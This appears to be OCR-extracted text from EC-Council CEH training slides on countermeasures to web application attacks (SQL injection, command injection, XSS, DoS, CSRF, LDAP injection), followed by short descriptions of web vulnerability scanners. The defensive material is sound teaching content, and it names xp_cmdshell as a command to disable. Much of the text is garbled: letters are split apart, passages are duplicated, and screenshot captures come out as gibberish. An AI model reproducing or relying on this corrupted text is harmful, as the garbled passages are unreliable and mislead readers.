1 A lw a y s use m e th o d a ttr ib u te s e t t o POST
Run d a ta b a s e se rv ic e a c c o u n t w ith m in im a l rig h ts
M o v e e x te n d e d s to re d p ro c e d u re s t o an is o la te d s e rv e r
Use typesafe variables o r fu n c tio n s such as IsN um eric() t o ensure ty p e s a fe ty

Microsoft
SQL
Server V a lid a te a n d s a n itiz e user in p u ts passed t o th e d a ta b a s e
Use lo w p riv ile g e d a c c o u n t f o r DB c o n n e c tio n
H o w to D e f e n d A g a in s t S Q L I n je c tio n A tta c k s
T o d e f e n d a g a i n s t S Q L i n j e c t i o n a t t a c k s , v a r i o u s t h i n g s h a v e t o b e t a k e n c a r e o f l i ke
u n c h e c k e d u s e r -in p u t to d a t a b a s e - q u e r i e s sh o u ld n o t b e a llo w e d to pass. Every u s e r v ariab le
p a s s e d to th e d a t a b a s e sh o u ld b e v alid a te d a n d sanitized. T he given in p u t sh o u ld be c h e c k e d
f o r a n y e x p e c t e d d a t a t y p e . U s e r i n p u t , w h i c h is p a s s e d t o t h e d a t a b a s e , s h o u l d b e q u o t e d .
e Limit t h e l e n g t h o f u s e r i n p u t
e Use c u sto m e rro r m e s sa g e s
e M o n i t o r DB t r a f f i c u s i n g a n IDS, W A P
e D i s a b l e c o m m a n d s like x p _ c m d s h e l l
e Isolate d a t a b a s e s e rv e r a n d w e b se rv e r
e A lw ay s u s e m e t h o d a t t r i b u t e s e t t o POST
e Run d a t a b a s e service a c c o u n t w ith m in im al rights
0 M ove e x te n d e d sto red p ro ced u res to an isolated server
0 Use ty p e s a fe variables or fu n ctio n s such as IsNum eric() to e n s u r e ty p e s a fe ty
© V alidate a n d sanitize u se r inputs p a s s e d to t h e d a ta b a s e

How to Defend Against Com m and - -‫״‬

Injection Flaws J L E !‫־‬
0 / H o w to D e f e n d A g a in s t C o m m a n d I n je c tio n F la w s
‫^׳‬ ' The sim plest way to protect against com m and injection flaws is t o avoid them
w h e r e v e r p ossible. S o m e la n g u a g e specific libraries p e r f o r m id entical fu n c tio n s fo r m a n y shell
c o m m a n d s a n d s o m e s y s t e m calls. T h e s e li b ra ri e s d o n o t c o n t a i n t h e o p e r a t i n g s y s t e m shell
i n t e r p r e t e r , a n d s o i g n o r e m a x i m u m s h e l l c o m m a n d p r o b l e m s . F o r t h o s e c a l l s t h a t m u s t still b e
u s e d , s u c h a s c a l l s t o b a c k e n d d a t a b a s e s , o n e m u s t c a r e f u l l y v a l i d a t e t h e d a t a t o e n s u r e t h a t it
d o e s n o t c o n t a i n m a l i c i o u s c o n t e n t . O n e c a n a l s o a r r a n g e v a r i o u s r e q u e s t s in a p a t t e r n , w h i c h
e n s u r e s t h a t all g i v e n p a r a m e t e r s a r e t r e a t e d a s d a t a i n s t e a d o f p o t e n t i a l l y e x e c u t a b l e c o n t e n t .
M o s t s y s t e m calls a n d t h e u s e o f s t o r e d p r o c e d u r e s w i t h p a r a m e t e r s t h a t a c c e p t valid i n p u t
strings to a c c e ss a d a t a b a s e or p r e p a r e d s t a t e m e n t s pro v id e significant p ro te c tio n , e n su rin g
t h a t t h e s u p p l i e d i n p u t is t r e a t e d a s d a t a , w h i c h r e d u c e s , b u t d o e s n o t c o m p l e t e l y e l i m i n a t e t h e
risk involved in these external calls. One can alw ays authorize the input to ensure the
p r o t e c t i o n o f t h e a p p l i c a t i o n in q u e s t i o n . L e a s t p r i v i l e g e d a c c o u n t s m u s t b e u s e d t o a c c e s s a
d a t a b a s e s o t h a t t h e r e is t h e s m a l l e s t p o s s i b l e l o o p h o l e .
The o th e r strong protection against c o m m a n d i n j e c t i o n is t o run w e b applications w ith th e

privileges re q u ire d to carry o u t th e ir fu n ctio n s. T h e re fo re , o n e sh o u ld avoid ru n n in g t h e w e b
se rv e r as a root, o r accessin g a d a t a b a s e as a DBADM IN, or else an a tta c k e r m a y b e a b le to
m isuse adm inistrative rights. T h e use of Java sandbox in t h e J2EE e n v i r o n m e n t stops th e
execution of th e system c o m m a n d s.

How to Defend Against XSS

C E H
Attacks
V a lid a te a ll h e a d e r s , U s e t e s t i n g t o o ls
c o o k ie s , q u e r y s tr in g s , E n c o d e In p u t e x t e n s iv e ly d u r in g t h e D o n o t a lw a y s
f o r m f ie ld s , a n d h id d e n and o u tp u t and d e s ig n p h a s e t o t r u s t w e b s it e s
f ie ld s ( i. e ., a ll p a r a m e t e r s ) f ilt e r M e ta e lim in a t e s u c h XSS t h a t u s e HTTPS
a g a in s t a r ig o r o u s c h a r a c te r s in t h e h o le s in t h e a p p lic a tio n w h e n it co m e s to
s p e c ific a t io n in p u t b e f o r e i t g o e s in t o u s e XSS
1 3 x 5 _ 7
▼
2
% 4 6 8
/
\ / \ y
U se a w e b F ilt e r in g s c r ip t o u t p u t C o n v e r t a ll n o n - D e v e lo p s o m e s ta n d a rd o r
a p p lic a tio n f ir e w a l l c a n a ls o d e f e a t XSS a lp h a n u m e r ic c h a ra c te rs s ig n in g s c rip ts w ith p r iv a te
t o b lo c k t h e v u l n e r a b il it ie s b y t o H T M L c h a r a c te r a n d p u b lic k e y s t h a t
e x e c u tio n o f p r e v e n t in g t h e m f r o m e n titie s b e fo r e d is p la y in g a c tu a lly c h e c k t o a s c e rta in

t h e u s e r in p u t in s e arch t h a t t h e s c rip t in tr o d u c e d
m a lic io u s s c r ip t b e in g t r a n s m i t t e d t o
e n g in e s a n d f o r u m s is re a lly a u th e n tic a te d
u s e rs
Copyright © by EC-Gauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
H o w to D e f e n d A g a in s t X S S A tta c k s
| T h e f o l l o w i n g a r e t h e d e f e n s i v e t e c h n i q u e s t o p r e v e n t XSS a t t a c k s :
Q C h e c k a n d v a l i d a t e all t h e f o r m f i e l d s , h i d d e n f i e l d s , h e a d e r s , c o o k i e s , q u e r y s t r i n g s , a n d
all t h e p a r a m e t e r s a g a i n s t a r i g o r o u s s p e c i f i c a t i o n .
© I m p l e m e n t a s t r i n g e n t s e c u r i t y policy.
© W e b servers, application servers, an d w e b application e n v iro n m e n ts are vulnerab le to

c r o s s - s i t e s c r i p t i n g . It is h a r d t o i d e n t i f y a n d r e m o v e X S S f l a w s f r o m w e b a p p l i c a t i o n s .
T h e b e s t w a y t o f i n d f l a w s is t o p e r f o r m a s e c u r i t y r e v i e w o f t h e c o d e , a n d s e a r c h in all
t h e p l a c e s w h e r e i n p u t f r o m a n HTTP r e q u e s t c o m e s a s a n o u t p u t t h r o u g h HTML.
Q A variety of d iffe re n t HTML ta g s can b e u s e d to tr a n s m i t a m alicious JavaScript. N essus,

Nikto, a n d o t h e r to o ls c a n h e lp t o s o m e e x t e n t fo r s c a n n i n g w e b s i t e s f o r t h e s e flaw s. If
v u l n e r a b i l i t y is d i s c o v e r e d in o n e w e b s i t e , t h e r e is a h i g h c h a n c e o f it b e i n g v u l n e r a b l e t o
o th e r attacks.
© F il te r t h e s c r i p t o u t p u t t o d e f e a t XSS v u l n e r a b i l i t i e s w h i c h c a n p r e v e n t t h e m f r o m b e i n g
tra n sm itte d to users.
© T h e e n t i r e c o d e o f t h e w e b s i t e h a s t o b e r e v i e w e d if it h a s t o b e p r o t e c t e d a g a i n s t XSS
a t t a c k s . T h e s a n i t y o f t h e c o d e s h o u l d b e c h e c k e d b y r e v i e w i n g a n d c o m p a r i n g it a g a i n s t
e x a c t specifications. T h e a r e a s sh o u ld b e c h e c k e d as follow s: t h e h e a d e r s , as well as

How to Defend Against DoS Attack C E H
S e c u re t h e r e m o te a d m in is tra tio n
a n d c o n n e c tiv ity te s tin g
P r e v e n t use o f u n n e c e s s a ry
C o n fig u re t h e f ir e w a ll t o fu n c tio n s s u c h as g e ts , s trc p y ,
d e n y e x te r n a l I n te r n e t a n d r e tu rn a d d re s s e s fr o m
C o n tr o l M e s s a g e P ro to c o l o v e r w r it t e n e tc .
(IC M P ) t r a f fic access
P re v e n t t h e s e n s itiv e
in fo r m a tio n
f r o m o v e r w r itin g
D a ta p ro c e s s e d b y th e
a tta c k e r s h o u ld b e s to p p e d
f r o m b e in g e x e c u te d
P e rfo rm th o r o u g h
in p u t v a lid a tio n
H o w to D e f e n d A g a in s t D o S A tta c k s
‫ל‬ T h e f o l l o w i n g a r e t h e v a r i o u s m e a s u r e s t h a t c a n b e a d o p t e d t o d e f e n d a g a i n s t DoS
attacks:
6 C o n f i g u r e t h e fire w a ll t o d e n y e x t e r n a l I n t e r n e t C o n t r o l M e s s a g e P r o t o c o l (ICMP) traffic

access.
© S ecu re th e re m o te a d m in istratio n an d connectivity testing.
© P re v e n t use of u n n e c e s s a ry fu n c tio n s such as gets, strcpy, a n d re tu rn a d d r e s s e s fro m

b e in g o v e r w r itte n , etc.
0 P re v e n t sen sitiv e in fo rm a tio n fro m overw riting.
0 P e rfo rm t h o r o u g h in p u t validation.
© D ata p ro c e s s e d by t h e a tta c k e r sh o u ld b e s to p p e d fro m being e x e c u te d .

How to Defend Against Web

Services Attack CEH
Urt1fw4 ilhiul lUtbM
Configure firew alls/ID S systems

fo r a web services anomaly and
signature detection
C onfigure WSDL Access
C o n tro l Perm issions t o g ra n t
o r deny access t o any ty p e o f
WSDL-based SOAP messages C onfigure firew alls/ID S systems
t o filte r im p ro p e r SOAP and
XM L syntax
Use d o c u m e n t-c e n tric
a u th e n tic a tio n c re d e n tia ls
th a t useS AM L
Im p le m e n t c e n tra liz e d in -lin e
re q u e s ts and responses
schem a v a lid a tio n
Use m ultiple security credentials
such as X.509 Cert, SAML
assertions and WS-Security
Block e x te rn a l references and
use p re-fetched c o n te n t w hen
de-referencing URLs
D e p lo y w e b services-capable
fire w a lls capable o f SOAP and
ISAPI level filte rin g
M a in ta in and u p d a te a secure
re p o s ito ry o f XM L schem as
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited
H o w to D e f e n d A g a in s t W e b S e rv ic e s A tta c k s
To d e f e n d a g a in s t w e b services attack s, t h e r e sh o u ld b e a provision for m ultiple layers

of protection that dynam ically enforces legitim ate application usage and b l o c k s all k n o w n
attack p a th s w ith or w ithout relying o n signature d a t a b a s e s . This c o m b i n a t i o n has proven
e f f e c t i v e in b l o c k i n g e v e n u n k n o w n a t t a c k s . S t a n d a r d H T T P a u t h e n t i c a t i o n t e c h n i q u e s s u c h a s
d i g e s t a n d SSL c l i e n t - s i d e c e r t i f i c a t e s c a n b e u s e d f o r w e b s e r v i c e s a s w e l l . S i n c e m o s t m o d e l s
i n c o r p o r a t e b u s i n e s s - t o - b u s i n e s s a p p l i c a t i o n s , it b e c o m e s e a s i e r t o r e s t r i c t a c c e s s t o o n l y v a l i d
users.
© C onfigure firew alls/IDSs for a w e b services a n o m a l y a n d s ig n a tu re d e te c tio n .
© C onfigure WSDL A ccess C ontrol Perm issions to g ran t or d en y access to any type of
W SD L-based SOAP m e s sa g e s.
© C o n fig u r e firew alls/ID S s y s t e m s t o filter i m p r o p e r SOAP a n d XML s y n tax .
© U s e d o c u m e n t - c e n t r i c a u t h e n t i c a t i o n c r e d e n t i a l s t h a t u s e SAML.
© I m p l e m e n t c e n tr a li z e d in-line r e q u e s t s a n d r e s p o n s e s s c h e m a v a lid a tio n .
© U se m u ltip le se c u rity c r e d e n tia ls su ch as X .509 Cert, SAML a s s e rtio n s , a n d W S-Security.
© Block e x t e r n a l r e f e r e n c e s a n d u s e p r e - f e t c h e d c o n t e n t w h e n d e - r e f e r e n c i n g URLs .
© D e p l o y w e b - s e r v i c e s - c a p a b l e f i r e w a ll s c a p a b l e o f S O A P - a n d ISAPI-level filterin g.

Web Application Countermeasures CEH
U nvalidated R edirects ^ Broken A uthentication

and Forw ards and Session M anagem ent
© A v o id using re d ire c ts a n d fo rw a rd s 8 U se SSL f o r a ll a u th e n tic a te d p a rts
o f th e a p p lic a tio n
e I f d e s tin a tio n p a ra m e te rs c a n n o t
be a v o id e d , e n s u re th a t th e S V e rify w h e th e r a ll th e users'
su p p lie d v a lu e is v a lid , and id e n titie s a n d c re d e n tia ls a re s to re d
a u th o riz e d f o r th e user in a h a s h e d fo r m
8 N e v e r s u b m it session d a ta as p a rt
o f a GET, POST
Cross-Site R eq u est In secure Cryptographic

Forgery S torage
L o g o ff im m e d ia te ly a f te r using a w e b C D o n o t c re a te o r use w e a k
a p p lic a tio n and c le a r th e h is to r y c r y p to g ra p h ic a lg o r ith m s
Do n o t a llo w y o u r b ro w s e r and ® G e n e ra te e n c r y p tio n k e y s o fflin e

w e b s ite s t o save lo g in d e ta ils a n d s to re th e m s e c u re ly
C heck th e HTTP R e fe rre r h e a d e r and © E nsure th a t e n c ry p te d d a ta s to re d
w h e n pro c e s s in g a POST, ig n o re URL o n disk is n o t easy t o d e c r y p t
p a ra m e te rs
W e b A p p lic a tio n C o u n te r m e a s u r e s
T he follow ing are t h e various c o u n te - m e a s u r e s th a t can b e a d o p te d for w e b

applications.
U n v alid ated R edirects an d F o rw ard s
A v o i d u s i n g r e d i r e c t s a n d f o r w a r d s if d e s t i n a t i o n p a r a m e t e r s c a n n o t b e a v o i d e d ; e n s u r e t h a t
t h e s u p p l i e d v a l u e is v a l i d , a n d a u t h o r i z e d f o r t h e u s e r .
Cross-Site R e q u e s t Forgery
© Log o f f i m m e d i a t e l y a f t e r u s i n g a w e b a p p l i c a t i o n a n d c l e a r t h e h i s t o r y .
© Do n o t a l l o w y o u r b r o w s e r a n d w e b s i t e s t o s a v e login d e ta i ls .
© C h e c k t h e H T T P R e f e r r e r h e a d e r a n d w h e n p r o c e s s i n g a P O S T , i g n o r e URL p a r a m e t e r s .
B roken A u th en ticatio n a n d Session M a n a g e m e n t
© U s e SSL f o r all a u t h e n t i c a t e d p a r t s o f t h e a p p l i c a t i o n .
© V e r i f y w h e t h e r all t h e u s e r s ' i d e n t i t i e s a n d c r e d e n t i a l s a r e s t o r e d in a h a s h e d f o r m .
© N e v e r s u b m i t s e s s i o n d a t a a s p a r t o f a G ET , P O S T .

Web Application Counterrr16a&11res

( C o n t ’d):
/ \ y / Insufficient T ran sp o rt L ayer Protection
S Non-SSL requests t o w eb pages s h ou ld be redirected t o th e SSL page
S Set th e 's e c u re ' flag on all s ensitive cookies

S C onfigure SSL p ro v id e r t o s u p p o rt o n ly s tro n g a lg o rith m s
2 Ensure th e c e rtific a te is v a lid , n o t expired, and m atches all dom ains used by th e site
S Backend and o th e r conn ections s h ou ld also use SSL o r o th e r e n c ry p tio n te c h n o lo g ie s TA

D irectory Traversal
V \
5 Define access rig h ts t o th e p ro te c te d areas o f th e w e b site
6 A p p ly c h e c k s /h o t fix e s th a t p re v e n t th e e x p lo ita tio n o f th e v u ln e ra b ility

T A
e
such as U nicode to affect th e d ire c to ry trave rsal
W eb servers shou ld be upd a te d w ith s e c u rity patches in a tim e ly m anner

▼
C ookie/S ession Poisoning

s v
S Do n o t s to re plain te x t o r w e akly e ncrypted passw ord in a cookie
S Im p le m e n t cookie's tim e o u t
t! Cookie's a u th e n tic a tio n credentia ls s h ou ld be associated w ith an IP address
S M ake lo g o u t fu n c tio n s available
.Ccipyright © by EC-CounGil. All Rights ReSeiveilReproduction is Strictly Prohibited.
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
T he follow ing are t h e various c o u n t e r m e a s u r e s t h a t can b e a d o p te d for w e b

applications.
Insufficient T ra n s p o rt Layer P ro te c tio n
© N o n - S S L r e q u e s t s t o w e b p a g e s s h o u l d b e r e d i r e c t e d t o t h e SSL p a g e .
© S e t t h e ' s e c u r e ‫ ׳‬f l a g o n all s e n s i t i v e c o o k i e s .
© C o n f i g u r e SSL p r o v i d e r t o s u p p o r t o n l y s t r o n g a l g o r i t h m s .
© E n s u r e t h e c e r t i f i c a t e is v a l i d , n o t e x p i r e d , a n d m a t c h e s all d o m a i n s u s e d b y t h e s i t e .
© B a c k e n d a n d o t h e r c o n n e c t i o n s s h o u l d a l s o u s e SSL o r o t h e r e n c r y p t i o n t e c h n o l o g i e s .
D irectory T raversal
© D efine access rights to t h e p r o t e c te d a r e a s of th e w e b site .
© A pply c h e c k s / h o t fixes t h a t p r e v e n t t h e e x p lo ita tio n o f t h e v u ln e ra b ility su c h as U n ic o d e

to affect th e directory traversal.
© W e b s e r v e r s s h o u l d b e u p d a t e d w i t h s e c u r i t y p a t c h e s in a t i m e l y m a n n e r .

Web Application Countermeasures C E H

( C o n t ’d )
S ecurity File I n j e c ti o n
M isconfiguration A ttack
Configure all security Perform type, pattern, and Strongly validate user input
mechanisms and tu rn o ff all d om a in value va lid a tio n on all
C onsider im plem enting a
unused services input data
c h ro o t ja il
Setup roles, permissions, and Make LDAP filte r as specific as
PHP: Disable a llo w _ u rl_fop e n
accounts and disable all possible
and a llow _url_include in
d e fa u lt accounts orchange Validate and re strict the
php.ini
th e ir d efa ult passwords a m o u n t o f data re tu rn e d to
th e user PHP: Disable register_globals
Scan fo r latest security
and use E_STRICTtofind
vulnerabilities and apply the Im plem ent tig h t access c o n tro l
uninitialized variables
latest se curity patches on th e data in th e LDAP
d ire cto ry PHP: Ensure th a t all file and
Perform d yna m ic testin g and stream s fu n c tio n s (stream _*)
source code analysis are ca refu lly ve tte d
W e b A p p lic a tio n C o u n te r m e a s u r e s ( C o n t ’d )
T he follow ing are t h e various c o u n t e r m e a s u r e s t h a t can b e a d o p te d for w e b

applications.
Security M isconfiguration
© C o n f i g u r e all s e c u r i t y m e c h a n i s m s a n d t u r n o f f all u n u s e d s e r v i c e s .
© S e t u p r o l e s , p e r m i s s i o n s , a n d a c c o u n t s a n d d i s a b l e all d e f a u l t a c c o u n t s o r c h a n g e t h e i r
default passw ords.
© Scan for latest security vulnerabilities a n d apply t h e latest sec u rity p a tc h e s .
LDAP I n j e c t i o n A t t a c k s
© P e r f o r m t y p e , p a t t e r n , a n d d o m a i n v a l u e v a l i d a t i o n o n all i n p u t d a t a .
© M a k e L DA P f i l t e r s a s s p e c i f i c a s p o s s i b l e .
© V alidate a n d restrict th e a m o u n t of d a ta re tu rn e d to th e user.
© I m p l e m e n t t i g h t a c c e s s c o n t r o l o n t h e d a t a in t h e L D A P d i r e c t o r y .
© P e rf o rm d y n a m ic te s tin g a n d s o u r c e c o d e analysis.

H o w to D e f e n d A g a in s t W e b
C E H
A p p lic a tio n A tta c k s
M a k e LD A P f i l t e r
as s p e c ific a s p o s s ib le
O p e ra tin g System LDAP S erver C ustom Error Page
. ~ H o w to D e f e n d A g a in s t W e b A p p lic a tio n A tta c k s
To defend against web application attacks, you can follow the counterm easures
s t a t e d p reviously. To p r o t e c t t h e w e b s e r v e r, y o u c a n u s e W AF firew all/ID S a n d filter p a c k e ts .
You n e e d t o c o n s t a n tl y u p d a t e t h e s o f t w a r e using p a t c h e s to k e e p t h e s e r v e r u p - t o - d a t e a n d to
protect it f r o m attackers. Sanitize and filter u s e r input, analyze the source code f o r SQL
injection, a n d m in im iz e u se of th i r d - p a r ty a p p lic a tio n s to p r o t e c t t h e w e b ap p licatio n s. You can
also u se s to re d p r o c e d u r e s a n d p a r a m e t e r q u e rie s to retrie v e d a ta a n d disable v e r b o s e e rr o r
m e s sa g e s, w hich can guide th e a tta c k e r w ith s o m e useful in fo rm atio n an d u se c u sto m e rro r
p a g e s t o p r o t e c t t h e w e b a p p l i c a t i o n s . T o a v o i d SQL i n j e c t i o n in t o t h e d a t a b a s e , c o n n e c t u s i n g a
n o n -p r iv ile g e d a c c o u n t a n d g r a n t le a s t privileges to t h e d a t a b a s e , ta b le s, a n d c o lu m n s . D isable
c o m m a n d s like x p _ c m d s h e l l , w h i c h c a n a f f e c t t h e O S o f t h e s y s t e m .

M o d u l e F lo w
W e b A pp P en Testing W eb A pp C oncepts
0 ‫י‬ I,
W eb A pp Threats
&
"*S C ounterm easures Hacking M e th o d o lo g y ^
N o w w e wi l l d i s c u s s w e b a p p l i c a t i o n s e c u r i t y t o o l s . W e b a p p l i c a t i o n s e c u r i t y t o o l s
h e l p y o u t o d e t e c t t h e p o s s i b l e v u l n e r a b i l i t i e s in w e b a p p l i c a t i o n s a u t o m a t i c a l l y . P r i o r t o t h i s ,
w e discussed w e b application c o u n te r m e a s u re s th a t p re v e n t attack ers from exploiting w e b
a p p l i c a t i o n s . In a d d i t i o n t o c o u n t e r m e a s u r e s , y o u c a n a l s o e m p l o y s e c u r i t y t o o l s t o p r o t e c t
y o u r w e b a p p l i c a t i o n s f r o m b e i n g h a c k e d . T o o l s in a d d i t i o n t o t h e c o u n t e r m e a s u r e s o f f e r m o r e
protection.
^ W e b A pp P en T esting W e b A pp C oncepts
Security Tools W eb App T hreats
C o unterm easures is! H acking M e th o d o lo g y

!L 3
W e b A pplication H acking Tools
O k

W e b A p p lic a tio n S e c u r ity T o o l: r E u
A c u n e tix W e b V u ln e r a b ility S c a n n e r i
J A c u n e tix W V S c h e c k s w e b a p p lic a tio n s f o r SQL in je c tio n s , c ro s s -s ite s c rip tin g , e tc.
Acunetix W eb V ulnerability Scanner (Free Edition)
: File Actions Took Conflguacicn Help

6 I t in c lu d e s a d v a n c e d p e n e tr a tio n
J Nov Scan | [fe J ;‫׳‬ _ 3 a|*> a |3 I ® | i 4,
te s tin g to o ls , such as th e HTTP Tcol•‫־‬-Expo-cr a 1 - J *^1 | at Rpperi y- ! • i l JRl: !ht^)://tefattpret.vtinwel~* | Piofife: D?fajll
E d ito r a n d th e HTTP Fuzzer Web Viin-rAMy S a n a 0
Web S t a r r
S co nR ett** gjj Alerts summary 77 alerts r
- 0 S:an‫־‬T>reac 1( htto:/.’tgs:aspnct.v<Jrr*cb. *> I
B -G Tod*
6 P o rt scans a w e b s e rv e r a n d runs ‫ <*}״‬Sne Oa«ter B AW >Ae‫׳‬t3 (7 7) A acunetix threot levol Acunetix Threat Level J
i :• • p T a ^ ii F n ie 5 O A S S Je‫ ־‬sa d d n q C 1a d eV jn efa b lt One or more hign seventy type
Level 3: High
s e c u rity checks a g a in s t n e tw o rk Sjbdonah Scanner * O Bed SQL Imrcson PJ vulnerabilities have been dtsccrrred b»
services
08Msam«r :
OHTTPEdto‫־‬
» O cn > * site sc ro trg (v en ted) CIO)
£ Q SQ
L‫׳‬ip ar (21)
west wtneoMtMS 3rd conpro‫׳‬T;« tne 1
backend database anfl'or de*xe you'
^ *Hnpsmrte ‫ י י‬O ‫ *׳‬od ca ccn er o r ireseace (3]
e Tests w e b fo r m s a nd p a s s w o rd - vfc HTTPPUZJC••:‫׳‬ 9-{l)
S A1.rt*>P‫*־׳‬n« « ‫'׳‬fpe*r » O ASPJETef««r ■ne*M
ft O Crow Prone Senjlrtg (S] S ToUl alctto found
p r o te c te d areas »C O w e < te * J t
9 O U « .* J e - 0J s a « « 1* n t n Jeai O High
»web S<rvcc & O Mwllum
» O lo on p flg etW M o o'd o u ew rgo tta c
s It in c lu d e s an a u to m a tic c lie n t
Web Se^vrr* Searme ^ :‫״‬
Web Se‫ ׳‬v«?e* td * r 9 O OPTIONS * c t o d ■ en eb lid (1) O>nw
B-itJ Co‫*־־‬91x«ton S ^ S n w i C o d » * V iau l S k u f Dai) 1 O informational
s c rip t a n a ly z e r a llo w in g f o r »1 ^ b-cr psoc web sarvar ‫׳‬c 90‫ ׳‬r dad
•• S:*‫*״‬
,•Hl'gv >■ ^ 0 0 6 : Prcntp•^ ntpnikn* for l>1i 2j target information ht1p://tett 81pnetvuinweb ri
s e c u rity te s tin g o f A jax and W eb 5:«‫™־‬1j<‫ «׳‬ot
» O < * 06 : :' 0e® tx a y .r e t se r s ‫< מ‬c fl
2 .0 a p p lic a tio n s li 1CTGeneral i 9 008: logn page CIO)
7123 MQuMti
S P^ff-ae'U»a»tr5
Verso ‫ ״‬Infwm own fi O type Input wltt *utocofttd v Stan It flnuhtd
t \ S^part Ctntm
<L
Ytrr.o+1
-g ) LKr :0.2001:30.02.SQLn«a‫־‬n ‫״״׳‬-Srd) ■fr,mine»t.a%px' a
10*0 O l J i J / , Mushed scanning.
UMT M«1.« (p0C ] £
:‫ ״‬AcuStrsa ■ 4
0
10.20 01:22.32, Savno scan re»J!3 ‫ ז‬database...
12.20 01:32.39, Dcnr wv n , b d 9 » « r.
10.2001:32.39,Fua «*‫־‬D uffer*.
http://www.acunetix.com
C opyright © by EC-Gauactl. A ll Rights Reserved. Reproduction is S trictly Prohibited.
Ff• W e b A p p lic a tio n S e c u rity T o o l: A c u n e tix W e b
V u ln e r a b ility S c a n n e r
Source: h ttp ://w w w .a c u n e tix .c o m
A cunetix W eb V ulnerability Scanner autom atically checks your web applications for S QL
i n j e c t i o n , XSS, a n d o t h e r w e b v u l n e r a b i l i t i e s . It i n c l u d e s a d v a n c e d p e n e tra tio n testin g tools,
such as th e HTTP E d it o r a n d t h e H T T P F u z z e r . It p o r t s c a n s a w e b s e r v e r a n d runs security
c h e c k s a g a i n s t n e t w o r k s e r v i c e s . It e v e n t e s t s w e b f o r m s a n d p a s s w o r d - p r o t e c t e d a r e a s . T h e
a u to m a ti c client script an aly z er allow s for secu rity te s tin g of A jax a n d W e b 2.0 a p p lic a tio n s.

W e b A p p lic a tio n S e c u r ity T o o l:

C E H
W a tc h e r W e b S e c u r ity T o o l
J W a tc h e r is a p lu g in f o r t h e F id d le r HTTP p r o x y t h a t p a s s iv e ly a u d its a w e b a p p lic a tio n t o fin d s e c u r ity

b u g s a n d c o m p lia n c e is s u e s a u t o m a tic a lly / * ,• ‫ץ‬
Q 5H W o j g Iwpettcxs I / *utoReapondir | Request Buoa | WfaSaK I _E

ID Log I ‫—־‬. rmch; 1 ■ v•8'
₪ Pas Lockfor*■‫׳‬ac!i«<»nar1pc4cytiks
J Header - ChecktM cathe-caMml HTTP header met to the regorg' vAx
that aCortart -Typeneattr Uhciuded h ths HTTPresponseandê>t8whent 3* « 0 * ₪ <*‫וי‬
•‫ ׳‬Header Cheeksthat IE?* XSSproteetenBier Koar»tf been ebabledbythe Webappteabon
OncMiHattheXCONTENT-TYPEOPTONSiJefcnje aflarvt MlME«fRnflha»b»»n dedjred ₪
J Header Cheeksth®!he XfRAMEOPTlONS■headern berg set for defer®• aqaral CkkJaefcro'attacks
B Heady Lccfcter «■«■ahAfrytlcalicr prctooolr
0 rtor‫*״‬ten 0<ac*«*re Owck for conwon 9‫׳‬mt mMoagw wtLinsdby database* *Hcfi may rd a e 9311! *toow• SDLO*
‫ז‬7‫ ן‬rfy -Bcn Dadeare Oteekfor dubom eoiment• that vnairartfuther attention M/A
7 rtomaton D*3c»je LooHlotevMlNe rtamatieripajesdttrojtfi HTTPwjjwt ul«twl*w*»a OWASPASV12
look for semttve rfenrater paiied Ihrouî URL [Mrarreteis OWASf ASVU
fTiJa<*«utrt-bu‫׳‬wr«^‫׳‬r*1crt«coJ*foruwc<d#>3r0usr‫׳‬ji1)fTK<J«xh w».'.wBSX
TSrt ‫־>■*׳־‬k mil srnnrh MTMl convnt, ineludmo comment! k common error mrsinor‫ *־‬returned by ptmtewns sue♦! as ( 6w»‫׳‬t ) Export NeAod• HTNLRwott
Af.PNTT and Web savers such 09 IIS ond Apoebe Y<hh 1ftonfioure Ibe l!v of common debug mer-wiges » look ter
it* nge •**‫ *י‬ttbamg URU
'S o J ft*.'* r-otfcuBtad.tan/m•febw/Ch««fc. Pmv.ltwCanbeUd.Jr/aiu vl£v«<t.1;>v?ul mrTMtVdw*
r r t t h o S c » r c lavaanix ivonti Ahrti may bo afrart‫»׳‬vmtrelUft*a‫׳‬
1J l»*i n w «•« Anrd m #»• ♦ 0 ‫נז‬40**‫ י‬data of an crto.nl' events
fordtntw folowô data of ac 'crrroueeow' event!
PH>v>arnng tv* j « rxjut m i:

PH»&10r ■ ytmralie
Vi'arrrg: Carr
mwdiaroiis 3‫ י‬User -rp>-‫׳‬f »aa fartd mthe felo»ng data of ar 'onerrof' event;
C 3 S 3 B 3 watdier Web Security Tool vt.3.0, Copyright C• 2010 C3;3ba ..C- AJI djitts reserved- casasa Aatc‫ «־‬V/cDSecurity Tool vlJ.O, CooyriQht©20:0 Casaoa Security. LLC. All risnu reserved.
http://www.casaba.com
W e b A p p lic a tio n S e c u rity T o o l: W a tc h e r W e b S e c u rity
J L T o o l
Source: h ttp ://w w w .c a s a b a .c o m
W a t c h e r is a p l u g i n f o r t h e F i d d l e r H T T P p r o x y t h a t p a s s i v e l y a u d i t s a w e b a p p l i c a t i o n t o f i n d
security bugs and com pliance issues autom atically. Passive detection means it's safe for
p r o d u c t i o n u s e . It d e t e c t s w e b - a p p l i c a t i o n s e c u r i t y i s s u e s a n d o p e r a t i o n a l c o n f i g u r a t i o n i s s u e s .

Web Application Security

C E H
Scanner: Netsparker
J N e ts p a rk e r p e r f o r m s a u to m a te d c o m p r e h e n s iv e w e b a p p lic a tio n s c a n n in g f o r v u ln e r a b ilitie s s u c h as SQ L
in je c tio n , c r o s s -s ite s c r ip tin g , r e m o te c o d e in je c tio n , e tc .
J I t d e liv e r s d e te c tio n , c o n f ir m a tio n , a n d e x p lo ita tio n o f v u ln e r a b ilitie s in a s in g le in t e g r a t e d e n v ir o n m e n t
s fa 11
‫י‬CMnWSw
C ro s s -s ite S c rip tin g
c
URL l a x / / 1c5tJ7.ne2Mrt«r.cQm:8l8! 1 fflefwra/MSiDyreftected32 ‫׳‬
P*‫ * — ד• ׳‬H •* 010 ‫! י * »־‬$ j ‫ ׳‬. Krtpt:
PARAMETER
ptram
MAME
PARAMETER
TVPC (Jjfryitnnj
ATTACK
PATTtftM «»a|p1»4k»t(0»0000l&)< ‫ח‬
‫ג‬ C L A S S IF IC A T IO N
V U L N E R A B IL I T Y D E T A IL S
XSS (O w rM t SoHAmu) d v «1 mn tv «*«-.**« • ki :.0 t u
dr«»*on1 kjhA (!••**C'pC V W c 1 <«(>*‫ ׳‬U o*
